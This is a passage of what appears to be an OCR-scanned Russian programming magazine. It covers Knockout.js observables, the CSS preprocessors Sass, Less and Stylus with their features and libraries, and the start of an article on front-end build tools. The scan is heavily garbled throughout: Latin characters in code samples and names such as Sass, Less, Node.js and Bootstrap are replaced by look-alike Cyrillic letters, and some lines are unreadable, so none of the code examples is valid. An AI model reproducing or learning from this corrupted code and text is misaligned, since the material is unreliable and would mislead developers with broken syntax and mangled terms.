взаимодеистви^ с представлением. Таких взаимодеиствии определено три: добав- 
ление подарка, удаление подарка и сохранение списка подарков на сервер. 

уаг 6 Ј-Ғ"сМос1е 1 = -Ғипс"СЈоп (§Ј-Ғт5) { 
уаг 5е1-Ғ = 1:ҺЈв; 

5е1-Ғ.§Ј-Ғ1: 5 = 1<о.оһ5егуаЫеАггау( %Ј-Ғ1:5); 
5е1-Ғ.ас1с1С1-Ғ1: = ^ипстЈоп( ) { 
5е1-Ғ . §Ј-Ғ"С 5 . ри5һ({ 



* 1111 

рпсе: 

}; 

5е1-Ғ . гетоуеб ЈҒс = -Ғипс1:Јоп(§Ј-Ғ1:) { 
5е1-Ғ.§Ј-Ғ1: 5 . гетоуе( &Ј-Ғ1:) ; 

}; 

5е 1-Ғ.5ауе = -Ғипс"СЈоп( -Ғогт) { 

кп _ |гН 1 <; . пп<;-М «;пп <Ч (" -Ғппт" ГА1 _ «;р1-Ғ ап-Ғ-һс^ • 



уаг у ЈеыМосЈе! = пеы С:1-Ғ - 1:Мос1е1 ( 5"ЕогесКзЈ-Ғ"С5 ) ; 

ко. арр1уВЈпс!Јп§5(уЈ еыМос1е1 ) ; 

Споркз, ты уже догадалс^, что клкзчева^ фишка зтого кода — ко.оо5еп/аЫеАггау(дЈТт5), 
котора^ и делает болвшукз частв всеи работы. Так и еств, 005еп/аЫе — әто спеи,и- 
алвные об^екты, которые умекзт уведомл^тв всех своих подписчиков об изменении 
данных и автоматически отслеживатв зависимости. Именно на них основано св^зы- 
вание данных в Кпоскоит, и оченв важно пониматв, что они собои представл^кзт. Хотв 
офиииалвна^ документаии^ и утверждает обратное (чтобы завлечвтеб^), нелвз^ әф- 
фективно работатв с Кпоскоит без знани^ того факта, что отслеживание зависимо- 
стеи внутри 005еп/аЫе5 работает в реалвном времени, то еств иепочка зависимостеи 
будет всегда выстроена заново при обраидении к оозеп/аЫе. Именно по әтои причине 
не стоит злоупотребл^тв зависимост^ми и не создаватв круговых зависимостеи. Хот^ 
Кпоскоих и не даст тебе выстрелитв себе в ногу, әто может привести к суидественным 
потер^м производителвности и болвшим разочаровани^м. 

Метод ко.арргуВтсПпд5(уЈе\л/Мос1е1) служит дл^ инии,иализаи,ии твоеи модели 
представлени^, фактически «запуска^» приложение. Он может приниматв вторым 
параметром указателв на ООМ-әлемент, которыи станет корневым дгт передан- 
нои \/Је\л/Мос!е1. Таким образом можно создаватв отделвные модели представлени^ 
дгт каждои части III. 

Выводы 

Говоритв о Кпоскои! и прини,ипах его работы можно долго и все равно не приити к ка- 
кому-то решакзидему выводу. М\Л/М-подход в разработке интерфеисов сам по себе 
еиде достаточно молод и не успел завоеватв должного довери^ вне .ЫЕТ-тусовки. 
Кпоскоитже, с однои стороны, имеет достаточно низкии порог вхождени^ и позвол^- 
етокунутвс^ в М\Л/М с головои, не выход^ избраузера. Сдругои — внутренние меха- 
низмы доволвно сложны и порои неоднозначны. Если ты попытаешвс^ исполызоватв 
его в болыиом одностраничном приложении, то рано или поздно обнаружишв себ^ 
зарывшимс^ глубоко в дебри исходников дгт оозеп/аЫе и биндингов. 
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В ЕДИНОМ СТИЛЕ 



Какты помнишһ, на зарө интөрнөта визуалвное прөдстав- 
лөниө докумөнтов иөликом ложилосһ на плөчи браузөров, 
которыө исполвзовали свои собственные встроенные 
стили длл отображенил различных НТМ1_-тегов. Посколвку 
никакими стандартами на тот момент оформление не ре- 
гламентировалосв, производители браузеров в борвбе 



за неокрепшие умы полвзователеи украшали странички 
как могли, и в резулвтате один и тотже документ мог ра- 
зителвно отличатвсл по внешнему виду в зависимости 
от ОС и браузера, в котором он отображалсл. 



РАЗБИРАЕМС^ В ОТЛИЧИ^Х 
ПРЕПРОиЕССОРОВ СЗЗ 



л^д^ на әту дикукз волвнииу, норвежскии ученыи-информатик Хокон Виум 
| Л и в 1994 году предложил производител^м браузеров кониетдикз каскадных 
таблии, стилеи, призваннукз отделитв оформление от структуры веб-стра- 
ни1ды и иеликом отдатв его на откуп веб-разработчиков. Иде^ приггтнуласв свеже- 
собранному консори,иуму\/\/ЗС, и после двух лет прении и согласовании спеиифика- 
|ди^ С55 1.1 была выброшена пр^мо на поле бо^ разгоравшеис^ воины браузеров. 
В далвнеишем спеиификаии^ С55 пережила еиде два мажорных релиза, обзавеласв 
огромнои кучеи новых своиств и умении, но кони,ептуалвно недалеко ушла от изна- 
чалвных редак1дии: задание стилеи, как и ранвше, сводилосв к монотонному пере- 
численикз своиств дл^ каждого әлемента индивидуалвно, браузеры исправно по- 
ставл^ли уникалвные префиксозависимые фичи. К тому же отсутствовали единые 
рекомендаи,ии по группировке (или сортировке) С55-своиств внутри блоков, что, 
в свокз очередв, порождало многочисленные холивары. 

В таком виде С55 вступил в конеи, двухтыс^чных, своеобразныи ренессанс 
фронтенд-разработки. С55-разметка все чаиде стала ложитвс^ на плечи профилв- 
ных фронтенд-разработчиков, которые быстро обнаружили, что в текуидем виде С55 
сложно поддаетс^ структуризаиии и автоматическои генераиии и не предоставл^- 
ет никаких возможностеи дгт гибкои и динамическои работы со стил^ми әлемен- 
тов. Гр^дуидии С553 обеидал немного скраситв ситуаиикз, предложив некоторые но- 
вые селекторы и встроенные средства дл^ работы с анимаииеи, но необходимоств 
в префиксах и отслеживании поддержки браузерами новых фич делала проиесс еиде 
более утомителвным. В резулвтате неуемныи әнтузиазм Пиоу- и Јауа5спр1:-разра- 
ботчиков вылилс^ в создание несколвких «семеиств» С55-препрои.ессоров, а также 
иелых фреимворков на их основе. 

В болыиинстве своем препроиессоры С55 преследукзт схожие иели: унифика- 
ии^ браузерных префиксов и хаков, упроидение синтаксиса, вложенноств селекто- 
ров и привнесение в описани^ стилеи базовои логики. Таким образом, вместо су- 
губо декларативного перечислени^ своиств по^вл^етс^ возможноств описыватв 
стили, исполвзу^ подходы и приемы, характерные дл^ «полноиенных» ^зыков про- 
граммировани^: переменные, миксины (некоторое подобие шаблонных наборов 
своиств, позвол^кзидее подстановки и замены внутри себ^), атакже ииклы, услови^ 
и несложнукз математику. 

В насто^идее врем^ многие из зтих приемов понемногу перенос^тс^ в спеи- 
ификаиии самого С55 (например, са1с() уже поддерживаетс^ болвшинством 
современных браузеров, в ближаишем будуидем в С55 ожидакзтс^ миксины, пе- 
ременные, задаваемые с помоидыо @уаг, и многие другие вкусн^шки), но неторо- 
пливоств \Л/ЗС никуда не деласв, а препроиессоры все әто предлагакзт уже сеичас 
и обеспечивакзт прекраснукз кросс-браузерноств получаемых на выходе стилеи. 



репроиессор 5азз начал свои путв в 2007 году как частв 
| | НТМ1_-шаблонизатора Нат1 дл^ Виоу оп ВаНз. Вдохнув 
в С55-разметку новукз жизнһ, он быстро завоевал симпа- 
тии рубистов, несмотр^ на отсутствие каких-либо средств отладки 
и необходимоств привыкатв к нестандартному «своему» синтаксису. 



■ 





В ранних верси^х создатели ЗаззХәмптон Кзтлин и Натан Ваии,енба- 
ум вместе с примкнувшим к ним впоследствии Крисом Әпштеином 
заложили в него многое из того джентлвменского набора, что сегод- 
н^ в том или ином виде сопровождает все С53-препрои,ессоры: пе- 
ременные, вычислени^, вложенные селекторы и миксины (в ранних 
верси^х, правда, статические и не позвол^кзидие подстановку аргу- 
ментов). По мере взрослени^ функ1дионалвноств Зазз суидественно 
расшир^ласв и дополн^ласв. 




При некоторои сноровке и уиме свободного времени на Зазз можно реализо- 
ватв, например, пузырвковукз сортировку . Красиво, бесполезно, работает... 



Переменные 

То, чего силвно не хватало оригиналвному С53, — переменные в 5азз записывактгс^ 
с помоидыо символа $ и позвол^кгг хранитв строки, |двета, булевы значени^ и даже 
|делые списки своиств: 



5А55 



$гесЈ: #ҒҒ4848 
$паггоы: 45рх 

$ај±1с1е_±ех1Ј 1.5егпЈ Не1уе"ЕЈсаЈ АгЈа!, запз-зегЈ-Ғ 

Строго говор^, переменные в 5азз скорее ^вл^кзтс^ константами: после присвое- 
ни^ значение переменнои изменитв нелыз^. Подставл^тв переменные можно в лк> 
бые своиства, также их можно исполызоватв в вычислени^х и некоторых интересных 
встроенных функ1ди^х 5азз. Например, дл^ работы с иветом еств отличные с!агкеп() 
и Идһ1еп(): 
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$гес1: #ҒҒ5Ө5Ө 
Һ1 

со!ог: $гес! 

Р 

со!ог: с!агкеп($гес1Ј 10%) 
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Һ1 { 

со!ог: #-Ғ-Ғ5Ө5Ө; 

Р { 

со!ог: #-Ғ-Ғ1с11с1; 



Встроенных функ1дии в 5азз множество, они позвол^кзт работатв с числами, строка- 

ММ 1\Л ПППЧИМИ МГЧВРГГГНЫММ .^ДСС ТМПДММ ЛДННЫҮ^ НР Ү\/ЖР ПППНП1 1РННПГП £1П ПППНЫМ 



список функ1дии можно наити в документаиии Зазз. 



Вложенностһ 

Зазз выводит работу с С55-селекторами на качественно новыи уровенв, позвол^^ 
отступами в коде указыватв их вложенноств. В резулвтате вместо утомителвного пе- 
речислени^ родителвских селекторов 
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сИу.1:ор1еүе1{^ 

// Какие-то своиства родителл 

1 

сИу.1:ор1еүе1 р { 

// Своиства вложенного әлемента 

1 

сИу.1:ор1еүе1 р и! { 

мы можем записатв все гораздо компактнее и проше: 
(ЈЈу.1:ор1еуе1 



Р 



и! 



Главное — не поддаватвс^ на провокаиикз легкости описани^ и не забыватв, что из- 
лишнеи вложенностыо С55-селекторов можно оыдутимо затормозитв парсинг С55 
в браузере. 

Импорт 

Еше одним долгожданным нововведением в 5азз стал импорт фаилов. Организо- 
ван импорт оченв просто: им^ подклкзчаемого фаила (в идеологии 5азз такие фаилы 
называкзтс^ Ра г« а | 5 ) должно начинатвс^ с нижнего подчеркивани^, а дгт его вклкзчени^ 
в основном фаиле нужно вызватв директиву @тс1ис1е и указатв относителвныи путв 
к подклкзчаемому фаилу. При зтом нижнее подчеркивание и расширение фаила мож- 
но опуститв. 
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@Јтрог"с 'һи"С"соп5' 

Кроме очевидного повторного исполвзовани^ кода, импорты позвол^кзт структури- 
роватв и организовыватв код, что особенно актуалвно дл^ болвших проектов. 



Вычисленил и миксины 

Миксины в Зазз — главныи генератор восторга и слез умилени^ у суровых борода- 
тых кодеров. Представл^^ собои некоторое подобие функи,ии, присуших «болыдим» 
^зыкам программировани^, миксины позвол^кзт исполвзоватв прини,ип ОВҮна пол- 
нукз катушку: описыватв заранее наборы С55-правил и подставл^тв их в лкзбое ме- 
сто легким движением руки: 
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=гес"Еап§1е-Ыоск($ХЈ $у) 
с!Ј5р1ау: Ыоск 
ыјс!"сһ: $х 
һеј§1тс: $у 



. здиаге 

+гес"сап§1е-Ыоск(5ӨрхЈ 5Өрх) 
раск%гоипсЈ-со1ог : гесЈ 

+гес"сап§1е-Ыоск(12ӨрхЈ 1Өрх) 
һаск§гоипсЈ-со1ог : Ыие 

На выходе получим воттакои С55: 
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.5диаге { 

са5р1ау: Ыос к; 

ыЈс!1:һ: 5Өрх; 

һ е Ј§1т с: 5Өрх; 
^аск§гоипсЈ-со1ог : гес Ј; 

Ј 

•1оп§ { 
с115р1ау: Ы оск; 
ыЈс11:һ: 12Өрх; 
һ е 1 §1 тс: 1Өрх; 
һаск&гоипсЈ-со1 ог: Ыие; 

} 

А ведв 5азз еше и поддерживает разнообразные вычислителвные и логические опе- 
раи,ии с известными ему типами данных: например, с размерами (Һе1§һ1:: ($512е + 
40рх) / 2) или |дветами ($һа5е-со1ог - #404040)! 

На основе 5а55 было создано немало библиотек и фреимворков. Особое ме- 
сто среди них занимает Сотраз5 , разработанныи одним из соавторов 5а55 Крисом 
Әпштеином. Он предоставл^ет в твое распор^жение подборку С553-миксинов, акту- 
алвныи ге5е1 всех встроенных браузерных стилеи, средства дгт создани^ различных 
дпсГов и 1ауои1'ов. Соглра55 также обеспечивает теб^ внушителвным количеством 
үтилит и хелпеоов: соедствами дгт оаботы с типогоасһикои. оасшиоеннои математи- 
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коидригонометриеи и многим другим. 



В 2009 году Алексис Селыз представил миру новыи инстру- 
мент дл^ более гибкои работы со стил^ми под названием 
кезз. Перва^ реализаии^ была разработана Алексисом 
на Виоу, и әто означало, что у Зазз по^вилс^ конкурент. 

В зто врем^ Ыос!е.Ј5 начал набиратв обороты. Алексис, чувству^ 
тенден1дикз, решил переписатв 1_езз на Јауа5спр1: и преподнес по- 
дарок на Денв заидитника Отечества в виде ЈпШа!-коммита . 

Теперв 1_езз может работатв как на сервере под Ыос!е.Ј5 или 
ВҺЈпо, так и на клиенте. Отмечу, что с кросс-браузерностыо осо- 
бых проблем не наблкздалосв, он нормалвно заводилс^ и работал 
даже в 1Е6. Поәтому некоторые ленивые разработчики исполвзова- 
ли его на клиенте без особых пл^сок с бубном: подклкзчил Ј5-фаил 
и пиши себе спокоино, не нужно подниматв Ыос!е.Ј5, настраиватв 
вотчеры, решатв иные проблемы (что с производителвностыоута- 
кого подхода, тебе, думакз, очевидно :)). 




В ответ на твит небезызвестнои в мире С55 Лии Веру о поисках браузерного 
компил^тора 5а55, реализаии^ Ио5а55 дгт С была портирована на Јауа5спр1: 
при помоиди ет5спр1:еп. Теперв при помоиди получившеис^ либы 5а55.ј5 , 5а55 
и 5С55 можно исполн^тв пр^мо в браузере! 



1_е55 доволвно быстро начал обретатв попул^рноств, ТмНег закззал его в своем 
фреимворке Воо{81гар, звездочки и форки в ӨЈШио росли. По данным опроса саита 
С55-1тЈск5.сот в 2012 году, 51% из всех, кто полвзуетс^ препрои,ессорами, отдакгг 
свое предпочтение 1_ез5, 5а55 + 5С55 — 41 %, 5*у1и5 — 6%, другим — 2%. 

Он не испытывает проблем с подсветкои синтаксиса в различных редакторах, 
также нет проблем и со встраиванием во всевозможные сборидики, начина^ Огипј 
и заканчива^ ЕЫВ . Нет проблем и с ӨШ-приложени^ми дгт сборки на разных плат- 
формах: Мас, \Л/Јпс!о\л/5 и других. 

В мае 2012 года Апексис передал контролв над разработкои и развитием проек- 
та команде, и, на мои взггтд, әто скорее плкзс, чем минус, так как спуст^ мес^и, по- 
сле прин^ти^ әтого решени^ активноств разработки над проектом возросла. Реб^та 
даже сделали новыи саит, которыи хорошо и пон^тно структурирован, как, впрочем, 
и документаии^. 

Основные возможности и фичи 

Активноств — әто хорошо, а какие плоды әтои активности по^вилисв в самом препро- 
иессоре? Что, например, предлагает 1_е55 дгт работы с С553? Градиенты, анимаи,ии, 
скруглени^, трансформаи,ии, транзишены в суровых реали^х вендорных префиксов 



дооавл^кл" немало раооты. А какие-ниоудв хелперы дл^ рутинных задач, например 
перевод изображении в Вазе64 или автосборка спраитов? 

Передтем как^ расскажу, что еств из фич, хочетс^ кратко озвучитвосновные воз- 
можности 1_езз. 



Переменные 

Переменные — они и в Африке переменные. Удобно исполызоватв дгт обБ^влени^ 
имени основных шрифтов, иветов. 



Миксины 

Позвол^кзт выделитв повтор^кзидиес^ куски кода, также могут приниматв вход^идие 
аргументы. Лкзбопытно, что еств своиство @аг§итепт_5, как в ЈауаЗспр!. 
Удобно исполызоватв дгт создани^ своих «функи,ии». 
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. һ^дге±±у^±ех± (со!оГј -ҒашЛуЈ 5Јге) { 



со!ог: @со!ог; 
^01Г---ҒатЈ1у : "-ҒатПу"; 
-Ғоп1:-5Ј2е: 5Јге; 



} 



. р-рге1:1:у-1:ех1:-1 { 



. р- рге^у-^ех^ ( ' гес! ' ј 'СотЈс 5ап5'Ј '27рх') 



} 



.һ-ргејју-јехј-! { 



со!ог: #-Ғ-ҒӨӨӨӨ; 



-Ғогг_--Ғат_.1у : "Сот_.с 5ап5 "; 
-Ғо п 1: - 5Јге: 27рх; 



} 



Расширенил 

Позвол^ет расширитвтекуидее правило правилом, указанным в расширении. Основ- 
ное отличие расширени^ от миксинов в том, что миксины позвол^кзт пробрасыватв 
дополнителвные параметры, а расширение не дублирует код за счет наследовани^ 
стилеи в С55. 
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.р-те55а§е { 
со!ог: Ыаск; 
оаск§гоипс1-со1ог : §гееп; 
һаск§гоипс!-Јта§е: иг!( ' /Ј/-Ғоо.рп§' ); 
оаск§гоипс1-гереа1:: по-гереа - .; 



. р-те55а§е-еггог { 
&:ех1:епс1( . р-те55а§е) ; 



оаск§гоипс1-со1ог : §гееп; 

} 
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. һ-те55а§е^ 

. 1з-те55а§е -еггог { 

со!ог : Ыас к; 
^аск§гоипс1-со1ог : §гее п; 

6аск§гоипс1-1та§е: иг! ( ' А /-Ғ00. рп§ ' ) ; 

һаск§гоипс!-гереа 1: : по- гереа1 :; 

} 

. һ - те 5 5 а §е -еггог { 

со!ог: ыһЈ1:е; 

^аск§гоипс1-со1ог: §гее п; 

} 

Импорт 

Подклкзчает внешние валидные фаилы 1_ез5, С55. 
Гуарды (диагсЈз) 

Позвол^кзт декларироватв условие, по которому мен^етс^ резулвтат выполнени^ 
правила дл^ селектора. 

. 1з-сһате1еоп (@уа!) шһеп (Н§1тспе55((д)уа1) >= 50%) { 
һаск§гоипс!-со1ог : Ыаск; 

} 

. р-сһате!еоп (@уа!) ыһеп (1Ј%1гспе55(@уа1) < 50%) { 
һаск§гоипс!-со1ог : шһјте; 

} 

.р-сһате!еоп (@уа!) { 
со!ог: @уа1; 

I 

.р--Ғоо { . р-сһате!еоп(#с1с1с1) } 
.р-оаг { . р-сһате!еоп(#555) } 
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. 1з--Ғоо { 
һаск§гоипс!-со1 ог: Ыаск; 
со1ог: #с1с1с1с1с1с1; 

.р-оаг { 
раск§гоипсЈ-со1 ог: ыһЈ1:е; 
со!ог: #555555; 



плердж 

Соединение в одно своиство несколвких своиств. 



.р-ри№)п() { 
һох-5һас!оы+: Јп5е"Е Ө Ө 1Өрх #555; 

} 

. р-ри+.+.оп-пехЈ { 
.р-ри1:1:оп(); 

һох-5һас!оы+: Ө Ө 2Өрх Ыаск; 
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.р-ријјоп-пехј: { 
һох-5һас!о ы: Јп5е"с Ө Ө 1Өрх #555, Ө Ө 2Өрх Ыаск; 

} 

Вложенноств правил, конкатеначил 

Простои пример исполвзовани^, вариаи,ии можно посмотретв в разделе Рагепј 
5е1ес1огз. 
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.р-рорир { 
розгЕоп: 1пхес1; 
расШп§: 2Өрх; 

& с!о5е { 

со!ог: гесЈ; 

} 

.р-ри"С"соп { 
розгЫоп: аһ5о!и1:е: 
сјо±±ојтс 2Өрх; 

— 1 
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.р-рорир { 
ро5гсоп: бхесЈЈ 
расШп§: 2Өрх; 



.р-рори р с!о5е { 
со1ог: гесЈ; 



. р-рорир . р-риИоп { 
ро 5ЈЫоп: а һ5о!и1:е: 
һо±±от : 2Өрх; 



Теперв снова можно вернутвс^ к фичам. Так вот, на последние два вопроса ответ 
простои — перевод изображении в Вазе64 по^вилс^ в версии 1 .4, п в свое врем^ 
активно работал с версиеи 1 .3, и зтои фичи чертовски не хватало, а вот автосборки 
спраитов из коробки нет. 

Библиотеки 

Что касаетс^ упроидени^ работы с С553, то тут на помоидв приходит Згс! рагЈу би- 
блиотека 1-Е55 Нај — лучшее, что сеичас еств дл^ зтих |делеи. Она покрывает болв- 
шинство кеисов, которые возникакзт при работе с С553, позвол^ет гибко передаватв 
параметры в миксины и делает вскз работу за теб^. 

Устроена по схожему прини,ипу с 1ЈЕ55 ЕЈетепЈз . Правда, сходство толвко в том, 
что зто тоже набор миксинов; таких проблем, как при исполвзовании 1_Е55 Е1еплеп1:5, 
не возникает. Решим ту же задачу: 
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@Јшрог1: ' 1е55һа1: . 1е55 ' ; 
.р-ри^оп { 



. раск§гоип(ј-Јта§е(Нпеаг-§гас1Јеп1:(1:о һо1:1:от, #-ҒҺ83-Ға 0%, геа 1 50%, #е93сес <-■ 
100%) ) 
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.р-риИоп { 

раск§гоипс1-1та§е: иг!(с !а1:а : Јта§е/5У§+хт1; ра5е64Ј РР94ЫлЈш§с1тУу с 21 ур ј ӨЈМ54ш 1 ЈА<-- 

/Рјхгс1тс§е615РпМ91тһ0<ЈНА6_у93с13сис12М^^ 

Ур22һ0Р51х$ 

һаск§гоипс!-Јтаее : -ыеЫ<Ј1:-1Јпеаг -§гас1Јеп1:(1:о рЈ #-ҒҺ83-Ға 0%, #-Ғ-ҒӨӨӨӨ 50%, <-■ 
#е93сес 100%); 

раск§гоипс1-1та§е: -то2-Ппеаг-§гас1Јеп 1:(1:орЈ #-ҒҺ83-Ға 0%, #-Ғ-ҒӨӨӨӨ 50%, <-■ 
#е93сес 100%); 

раск§гоипс!-Јта§е : -о-1Јпеаг -§гасЈЈеп1:(1:орЈ #-Ғр83-Ға 0%, #-Ғ-ҒӨӨӨӨ 50%, <-■ 
#е93сес 100%); 

һаск§гоипс1-1та§е: 1Јпеаг- §гас1Јеп1:(1:о Һо^^оШј #-ҒҺ83-Ға 0%, #-Ғ-ҒӨӨӨӨ 50%, <-■ 
#е93сес 100%); 

} 

Так в чем же хитроств 1_Е55 На1:? Как они реализовали гибкоств вызовов миксинов? Все 
просто. В 1_ез5 мы можем исполн^тв Јауа5спр1: в прои,ессе обработки стилеи, и авто- 
ры библиотеки парс^т входные данные в миксин и преобразукзт их в нужныи вид. 

Кстати, миксины библиотеки не пишутс^ руками, а описывакзтс^ в Ј5-фаилах 
в определенном формате. Сами 1_езз-миксины создактгсл на основе әтих фаилов 
с помоидыо сборки Өгип!. 

Отмечу как плкзс, что данныи подход позволил им покрытв тестами резулвтат ра- 
боты библиотеки. 



В обидем и иелом 1_езз — хорошии инструмент; в свое врем^ он страдал от недостат- 
ка внимани^ со стороны разработчиков, и ему не хватало библиотеки дл^ работы 
с С553. Сеичас зти проблемы отход^т на заднии план, и пару 1_е55 + 1_Е55 На1: можно 
рассматриватв как один из кандидатов в стеке технологии фронтенд-разработчика. 



ервыи релиз 5ју1из состо^лс^ 31 ^нвар^ 2011 года, и прак- 
| | тически следом за ним зарелизиласв библиотека 1ЧЈо , 

Ј упроидакзида^ работу с С553 и решакзида^ проблему кон- 

трол^ вендорных префиксов. 

Автором 51:у1и5 и, что немаловажно, N10 ^вл^етс^ небезызвест- 
ныи ТЈ Но1о\л/аусһик , которыи описывает 51:у1из как револкзиионно 
новыи ^зык. Не^сно, правда, что именно в нем револкзиионного: 
по возможност^м он примерно на одном уровне с 5азз и 1_е55. 

5{у1и5 было не так сложно отвоеватв свокз частв рынка: многие 
разработчики были знакомы с хорошо зарекомендовавшими себ^ 
проектами ТЈ Но1о\л/аусһик (Ехрге55, Јас!е, Мосһа). Также немало- 
важным оказалосвто, что в комплекте шел N10. Приобретенна^ по- 
пул^рноств сыграла свокз ролв, и вот уже многие 10Е поддержи- 
вакзт синтаксис 5{у1и5, системы сборки знактг, как и чем собиратв 
его, дл^ Соппес!: написан 1тпс1с11е\л/аге дгт исполнени^ в гипИпле. 

В проекте на текуидии момент 113 контрибыотеров, которые 
активно пил^т, в том числе еств разработчики из России, реб^та 
из ^ндекс.Почты (кстати, в Почте исполвзуетс^ 51:у1из). 

Да, у 51:у1и5 определенно еств свои плкзсы, он изначалвно разрабатывалс^ 
на Јауа5спр1:, еств возможноств исполызоватв несколвко синтаксисов: индентныи 
Виоу-стаил и классическии С55. Также можно отнести к плкзсам, что у препрои,ес- 
сора и библиотеки один автор, которыи ^вно понимал ее важноств и необходимоств. 




Основные возможности и фичи 

У 51:у1из еств пара примечателвных отличии от его коллег по и,еху. Перва^ из них — 
зто возможноств получатв значени^ своиств в контексте одного правила: 



5ТҮШ5 



.6-рорир { 
ро5Ј1:Јоп: 1пхес1; 
^ор: 50%; 
Һеј§һ1:: 2ӨӨрх; 
шаг§Јп-1:ор: -(@һе_§һ1: / 2); 



Втора^ — әто не^вныи вызов миксинов, что добавл^ет синтаксису 51:у1из әлегант- 
ноств и читаемоств. Хот^, с другои стороны, из-за әтои фичи может пострадатв по- 
нимание кода, смотри пример, и сам все поимешв: 
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// Обһлвллем миксин 
һаск%гоипс1( ) { 
һаск§гоипс1: #-Ғ-Ғ-Ғ-Ғ-Ғ-Ғ; 

.Јз-һи^оп { 

// Нелвно вызываем его 
раск§гоипс1: #ӨӨӨӨӨӨ; 
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.Һ-Ешјјоп { 
раск§гоипс1: #-Ғ-Ғ-Ғ; 

-1 

В осталыном 5тү1из похож на своих конкурентов. Он также, как и 1_е55, может выпол- 
н^твс^ в браузере, может переводитв изображени^ в Вазе64, так же, как и у Зазз, 
еств автосборка спраитов (Згс! раПу), имеет схожие базовые возможности : перемен- 
ные, миксины, расширение, импорт, ветвление, вложенноств правил, конкатенаии^ 
(кстати, у Зазз әтои возможности нет). 

Хочетс^ показатв пример исполвзовани^ автосборки спраитов (в свое врем^ про- 
читал об зтои фиче у команды разработки Ғасеһоок и был впечатлен, теперв и ты мо- 
жешв исполвзоватв ее): 



5ТҮШ5 



$апЈша1:ес1_Пате = 5ргЈ1:е-тар( 'Пате ' ) 
#Лате 

һаск%гоипс1: иг!(5ргЈ1:е-иг1($апЈта1:есЈ_Пате) ) по-гереа^ 
һеЈ£ЈгсЈ 5ргЈ1:е-һеЈ§һ1:($апЈта1:ес1_ПатеЈ Ч1ате_а_ӨӨӨ1 ' ) 
мјсј^һ: 5ргЈ1:е-1\/Ј(„1:һ($апЈта1:ес1_11атеЈ 'Лате_а_ӨӨӨ1 ' ) 

.-Пате--Ғгате-1 
һаск§гоипс!-ро5Ј1:Јоп : 5ргЈ1:е-ро5Ј1:Јоп<- 
($апЈта1:ес1_ЛатеЈ 'Лате_а_ӨӨӨ1 ' ) 

.-Пате--Ғгате-2 

һаск§гоипс1-ро5Ј1:Јоп : 5ргЈ1:е-ро5Ј1:Јоп($апЈта1:ес1_ПатеЈ Ч1ате_а_ӨӨӨ2 ' ) 
#Пате X- 

һаск§гоипс1 : иг1( . . /_.та§е5/Пате-4е9с94с13-Ға . рп§) по- гереа !:; 
һ е ј§ һ"с: 512рх; 
ыЈсЈ1:һ: 512рх; 

1 

.Пате--Ғгате-1 { 
һаск§гоипс!-ро5Ј"сЈо п : Ө Ө; 

1 



• иашс I I ашсЈ^д_ 

оаск§гоипс1-ро5Ј1:Јоп : 0 -512рх; 

1 

Библиотеки 

У 51у1из еств флагманска^ библиотека, о которои п уже не раз говорил, — зто N10, 
но можно посмотретв и на милые алвтернативы ОоокЈе и В00Т5 Ахјз. 

Ыјр — помимо средств нормализаи,ии работы с С553 (дгасПепТз, оох-5һас1о\л/, 
Тгап5Тогпп, Тгап^Шоп, апЈтаИоп...), еств еш,е и утилиты обнулени^ своиств дефолтных 
стилеи браузера (с возможностыо обнул^тв своиства по группам, например ТопТ, ис- 
полвзоватв с1еагТЈх и другое). Все наборы разбиты по группам, что дает возможноств 
подклкзчатв конкретно то, что нужно. 



5ТҮШ5 



@Јтрог"с 'пЈҺ'; 

оаск%гоипс1: Ппеаг-%гас1Јеп1:(1:орЈ ыҺјтӨј Ыаск); 
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.һ-һиттоп { 

раск§гоипс к -У\/еһкЈ1 :-§гас1 Јеп1:(ПпеагЈ 1е-Ғ1: тоРј 1 е-Ғт ҺоттоШј со1ог-5"сор( 0Ј <-■ 
#-Ғ-Ғ-Ғ)ј со1ог-5ТОр(1ј#ӨӨӨ)); 
^аск§гоипсЈ: -ыеһ ки-1Јпеаг-§гас1Јеп1:(торЈ #-Ғ-Ғ-Ғ 0%, #ӨӨӨ 100% ); 
оаск§гоипс1: -то2-Нпеаг-§гасЈ1еп1:(1:орЈ #-Ғ-Ғ-Ғ 0%, #000 100% ); 
оаск§гоипс1 : 1Јпеаг- §гас1Јеп1:(1:ор Ј #ҒҒҒ 0%, #000 100%); 

1 

РоокЈе — набор полезных миксинов, призванных избавитв теб^ от рутиннои работы 
с С553 и не толвко. В составе еств : гезеТ, погплаИге, С553 и доволвно непривычныи 
синтаксическии сахар. 

ВооТз Ахјз ^вл^етс^ частыо более крупного тулкита лучших решении. По возмож- 
ност^м похож на ОоокЈе, тоже имеет свои странныи сахар, но еиде еств более стран- 
ное решение под названием оиТТопз (стили дгт кнопок) и ш (стили дгт блоков ноти- 
фикаи,ии). 

Заклк>чение 

5Ту1и5 — гибкии препрои,ессор, с активным сообшеством, мошными библиотеками 
и с болһшим количеством Згс! рагТу решении. У него светлое будушее, скорее даже уже 
светлое насто^шее. На мои взгллд, несомненныи лидер в гонке препрои,ессоров. 



Соиег 81огу 



Денис Бугарчев, 

разработчик интерфеисов, ^ндекс.Маркет 

редеро1@дтаЈ1.сот 




СОБРАТВ 

ЗА 60 СЕКУНД 



РАЗБИРАЕМС^ С ПОПУЛ^РНЫМИ 
СИСТЕМАМИ СБОРКИ ФРОНТЕНДА 

В тө времена, когда саиты были неболыиими, необходимо- 
сти в отделвнои сборке фронтенда не было. Однако об^ем 
и сложноств СЗЗ и ЈЗ все увеличивалисв, и вид, в котором 
удобно разрабатыватв, стал силвно отличатвсл от вида, 
в котором нужно показыватв резулвтат полвзователно. 
Полвилисв такие задачи, как конкатенаиил (склеивание) 
фаилов, минимизаиил кода и даже предварителвнал ком- 
пиллиил. Резулвтатом әтого стали спеииализированные 
системы сборки фронтенда, о которых мы и расскажем. 



азумеетс^, как толвко необходимоств в сборке стала оидутима, тут же 
на фронтенд начали переползатв инструменты, исполвзовавшиес^ бәкен- 
_> дом. Основна^ ихпроблемаи причинатого, что вданныи моментихвсе менв- 
ше исполвзукзт дгт фронтенда, — они совершенно не заточены под его спеиифику, 
так как структура проекта, исполвзуемые технологии и и,икл разработки оченв силв- 
но завис^т от задач проекта и могут значителвно отличатвс^. Тот же Апт, например, 
обладает многословным синтаксисом и не особо умеет делатв нужные дгт фронтен- 
да веиди: встроенных задач совсем немного, а расшир^етс^ он плохо. Если говоритв 
о Ө1Ч11 таке, то он гораздо более универсалвныи, посколвку оперирует зһеП-коман- 
дами. Из недостатков нужно упом^нутв об особом синтаксисе, которыи надо допол- 
нителвно изучатв, необходимости хорошо знатв зһеП, а также тендени,ии к быстрому 
усложненикз МакеТНе при росте требовании ксборке. 

Даваи рассмотрим средних размеров саит со стандартнои структурои и попробуем 
